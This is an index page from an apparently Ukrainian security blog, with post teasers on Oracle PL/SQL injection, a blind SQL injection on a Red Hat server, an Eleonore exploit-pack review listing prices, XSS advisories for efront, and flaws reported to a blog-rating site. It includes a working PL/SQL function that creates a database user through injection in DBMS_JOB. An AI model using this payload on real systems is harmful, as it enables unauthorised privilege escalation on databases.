Після невдалого rfi\lfi на одному з серверів AOL, шукав я де б знайти чогось відомого, ось и натрапив на редхат, а там швиденько знайшов скулю. blind sql-inj. Як виявилось, там ще у юзера і file_priv=y.
Не буду тягнуть кота за яйця:
Read more…
Не люблю багато писати, тому все швиденько та по порядку: шукав функцію вразливу до sql-injection під свої потреби, наткнувся на таку в пакеті dbms_job який належить sys користувачеві, функція find_date.
...
30 CUR := DBMS_SQL.OPEN_CURSOR;
31 BEGIN
32
33 DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, ' || INTERVAL ||
34 ' from dual', DBMS_SQL.NATIVE );
...
INTERVAL – вразливий параметр. Але тут проблема: функція не оголошена в пакеті, тобто її можна використовувати тільки всередині пакету, під мої потреби це не підходить, хоча, можливо комусь і буде потрібно. Але щоб довести справу до переможного кінця, знайшов процедуру в пакеті яка цю функцію використовує, вона там не одна, але так як мені ця функція не підійшла, я взяв першу ліпшу.
...
134 MYDATE: = FIND_DATE (INTERVAL);
135 IF NOT NO_PARSE THEN
136 PARSE_JOB (WHAT);
137 END IF;
138
...
Створюємо функцію, хоча можна використати і курсор, але я віддаю перевагу старій школі.
CREATE OR REPLACE FUNCTION fff return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'create user fff identified by fff';
COMMIT;
RETURN 'sys';
END;
/
Ну і власне сам експлойт (під катом):
Read more...
Хочу надати вам інформацію про тестування зв’язки експлойтів Eleonore exploits pack version 1.2. Написана вона автором Exmanoize. В склад зв’язки входять такі експлойти
Середній пробив характерний для звязки:
Ціни:
Як не дивно, та в системі присутні вразливості, далі про них.
Нещодавно мною були виявленні численні вразливості на сайті top.blog.net.ua. В той же день про це була повідомлена адміністрація проекту, але, нажаль відповіді я так і не отримав. Сподіваюсь цей пост спонукає їх виправити вразливості. А тепер блище до справи.
UA TOP Bloggers визначає позиції сайту за такими показниками:
Розглянемо як система реєструє ці дані. Від нас вимагають встановити код кнопки на сайті. Логічно що через нього і проводиться підрахунок. Поглянемо на код:
Все зрозуміло – картинка генерується скриптом, якому передаються 2 параметри: in,id. Id це і є номер нашого сайту.
27.10.09
Програма: efront
Версія 3.5.5
Рівень небезпеки: Низький
Опис:
Вразливість дозволяє віддаленому користувачу провести XSS атаку.
На сайті efrontlearning.net запевняють що в релізі 2009/11/23 v3.5.5 build 5208 :
• Added additional sanitization to eliminate xss attacks
27.10.09
Програма: efront
Версія 3.5.3
Рівень небезпеки: Низький
Опис:
Вразливість дозволяє віддаленому користувачу провести XSS атаку.
Вразливість існує через недостатню фільтрацію вхідних данних в параметрах “lessons_ID“, “message” в сценарії index.php. Read more…
Написав нескладний exploit, що використовує уразливість в DBMS_SQLHASH.GETHASH. Exploit для роботи потребує sql ін’єкцію в pl / sql процедурі (зазвичай, на Oracle Application server, там і належать такі процедури по дефолту користувачеві з правами, яких нам достатньо). Загалом можна запитати, навіщо нам exploit, якщо є ін’єкція? Я відповім, що часто в таких процедурах йде простий sql select / update / insert, а в них ми можемо використовувати тільки простий sql. Даний exploit дозволяє виконати pl / sql, маючи при цьому тільки ін’єкцію у процедурі, яка виконує, скажімо, select і права тільки create_session.
Останні коментарі